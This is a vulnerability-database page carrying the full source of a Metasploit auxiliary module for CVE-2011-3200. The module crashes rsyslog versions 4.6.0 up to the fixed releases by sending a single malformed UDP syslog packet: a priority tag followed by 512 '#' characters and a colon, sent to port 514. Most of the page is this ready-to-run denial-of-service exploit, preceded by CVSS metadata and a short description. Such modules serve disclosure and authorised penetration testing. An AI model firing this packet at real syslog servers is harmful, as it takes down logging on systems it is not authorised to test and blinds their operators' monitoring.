rsyslog Long Tag Off-By-Two DoS

2011-09-0215:55:54

hdm <[email protected]>

www.rapid7.com

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

JSON

This module triggers an off-by-two overflow in the rsyslog daemon. This flaw is unlikely to yield code execution but is effective at shutting down a remote log daemon. This bug was introduced in version 4.6.0 and corrected in 4.6.8/5.8.5. Compiler differences may prevent this bug from causing any noticeable result on many systems (RHEL6 is affected).

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Udp
  include Msf::Auxiliary::Dos

  def initialize
    super(
      'Name'        => 'rsyslog Long Tag Off-By-Two DoS',
      'Description' => %q{
          This module triggers an off-by-two overflow in the
        rsyslog daemon. This flaw is unlikely to yield code execution
        but is effective at shutting down a remote log daemon. This bug
        was introduced in version 4.6.0 and corrected in 4.6.8/5.8.5.
        Compiler differences may prevent this bug from causing any
        noticeable result on many systems (RHEL6 is affected).
      },
      'Author'      => 'hdm',
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'CVE', '2011-3200'],
          [ 'URL', 'https://www.rsyslog.com/potential-dos-with-malformed-tag/' ],
          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=727644' ],
        ],
      'DisclosureDate' => 'Sep 01 2011')

    register_options(
      [
        Opt::RPORT(514)
      ])
  end

  def run
    connect_udp
    pkt = "<174>" + ("#" * 512) + ":"
    print_status("Sending message containing a malformed RFC3164 tag to #{rhost}")
    udp_sock.put(pkt)
    disconnect_udp
  end
end